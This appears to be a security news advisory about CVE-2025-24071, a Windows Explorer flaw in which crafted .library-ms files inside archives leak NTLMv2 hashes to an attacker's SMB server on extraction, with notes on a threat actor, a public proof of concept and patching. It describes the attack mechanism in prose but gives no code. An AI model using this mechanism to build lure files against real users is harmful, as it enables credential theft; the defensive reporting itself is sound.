A critical vulnerability in Windows File Explorer, identified as CVE-2025-24071, has been discovered and is being actively exploited in the wild.
This vulnerability allows attackers to capture NTLM hashes, potentially leading to network spoofing attacks.
The exploit involves specially crafted .library-ms files embedded within compressed archives like RAR or ZIP.
When these files are extracted, Windows Explorer automatically processes them, initiating an NTLM authentication handshake with an attacker-controlled SMB server without requiring user interaction.
Technical Explanation of NTLM Hash Leak
The .library-ms file format is XML-based and is trusted by Windows Explorer to define search and library locations.
When a specially crafted .library-ms file containing an SMB path is extracted from a compressed archive, Windows Explorer attempts to resolve this path automatically to gather metadata and index file information.
This action triggers an implicit NTLM authentication handshake from the victim’s system to the attacker-controlled SMB server, leaking the victim’s NTLMv2 hash without explicit user interaction.
The vulnerability exploits Windows Explorer’s automatic file processing mechanism, which occurs even if the user never explicitly opens the extracted file.
Exploitation
The exploitation of CVE-2025-24071 is facilitated by its offer for sale on dark web forums, with a threat actor known as “Krypt0n” linked to its exploitation.
This actor has developed malware called “EncryptHub Stealer,” further emphasizing the urgency of patching affected systems.
Microsoft addressed this vulnerability in its March Patch Tuesday update, and users are advised to ensure their Windows systems are updated with the latest security patches to prevent exploitation.
A Proof of Concept (PoC) for CVE-2025-24071 has been released on GitHub, demonstrating how attackers can exploit this vulnerability using a Python script.
The script generates a malicious .library-ms file and embeds it within a RAR or ZIP archive, requiring minimal input such as the target file name and the attacker’s IP address.
The vulnerability’s potential for exploitation underscores the importance of keeping Windows systems updated and implementing additional protections against NTLM relay attacks.
